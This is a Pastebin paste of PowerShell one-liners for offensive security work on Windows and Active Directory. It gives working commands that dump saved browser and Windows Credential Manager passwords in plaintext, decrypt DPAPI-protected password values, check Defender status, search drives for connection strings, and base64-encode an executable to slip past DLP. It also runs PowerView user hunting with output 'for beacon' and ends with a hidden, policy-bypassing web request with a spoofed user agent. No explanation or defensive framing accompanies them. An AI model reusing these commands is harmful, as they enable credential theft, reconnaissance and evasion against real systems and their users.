opexxx

Powershell4infosec.txt

Oct 21st, 2020 (edited)
173
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Install module
  2. Install-Module AADInternals
  3. Install-Module -Name CredentialManager
  4. Install-Module -Name BetterCredentials
  5.  
  6. # Import the module
  7. Import-Module AADInternals
  8.  
  9.  
  10. Install-Module -Name AzureAD
  11. Install-Module MSOnline
  12.  
  13. Install-Module PSReadline -AllowPrerelease
  14. Install-Module -Name Az.Tools.Predictor
  15. import-module Az.Tools.Predictor
  16. Set-PSReadLineOption -PredictionSource HistoryAndPlugin
  17. Set-PSReadLineOption -PredictionViewStyle ListView
  18.  
  19. #####
  20. Get-ADObject -Filter * -SearchBase "CN=Sites,CN=Configuration,DC=domain,DC=com" -SearchScope OneLevel | % { "Site Name: $($.Name)",((Get-Acl "AD:\$").Access | select IdentityReference,ActiveDirectoryRights | fl) }
  21. ######
  22.  
  23.  
  24.  
  25.  
  26. # Content: Receive Credentials from IE & Edge
  27. [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
  28. $vault = New-Object Windows.Security.Credentials.PasswordVault
  29. $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | select username,resource,password
  30.  
  31. [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword();$_ }
  32.  
  33. Get-StoredCredential | % { write-host -NoNewLine $_.username; write-host -NoNewLine ":" ; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password) ; [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); }
  34.  
  35. Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | ForEach-Object {if($($_.displayName) -eq "Windows Defender"){if("$($([Convert]::ToString($($_.productState), 16)).PadLeft(6,""0""))".Substring(2,1) -eq "1"){Write-Host "Windows Defender is Enabled"}else{Write-Host "Windows Defender is Disabled"}}}
  36.  
  37. gci c:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString"
  38.  
  39. gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinue
  40.  
  41. [System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser))
  42.  
  43.  
  44.  
  45.  
  46.  
  47. ###DLP
  48. [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\file.exe")) | Out-File -Encoding ASCII C:\Temp\file.txt
  49.  
  50.  
  51.  
  52.  
  53.  
  54. PowerVeiw and output localy to disk for beacon:
  55.   powershell -no -exec bypass -command "& {Import-Module .\PowerView.ps1; Invoke-UserHunter USRNAME | Out-File -Encoding Ascii USERNAME.txt}"
  56.  
  57. Powerview UserHunting Search by keyword:
  58.   powershell Get-NetUser -Filter "(description=*medical*)" | Select-Object -Prop samaccountname.description,title
  59.   powershell Get-NetUser -Filter "(title=*medical*)" | Select-Object -Prop samaccountname.description,title
  60.  
  61. Simple Web request:
  62.   powershell.exe -w hidden -command $wc = New-Object System.Net.Webclient; $wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64;Trident/7.0; AS; rv:11.0) Like Gecko'); $wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; $wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $wc.downloadstring('http://google.com/')
  63.  
  64.  
  65.  
  66.  
  67.  
  68.  
  69.  
  70.  
  71.  
  72.  
Add Comment
Please, Sign In to add comment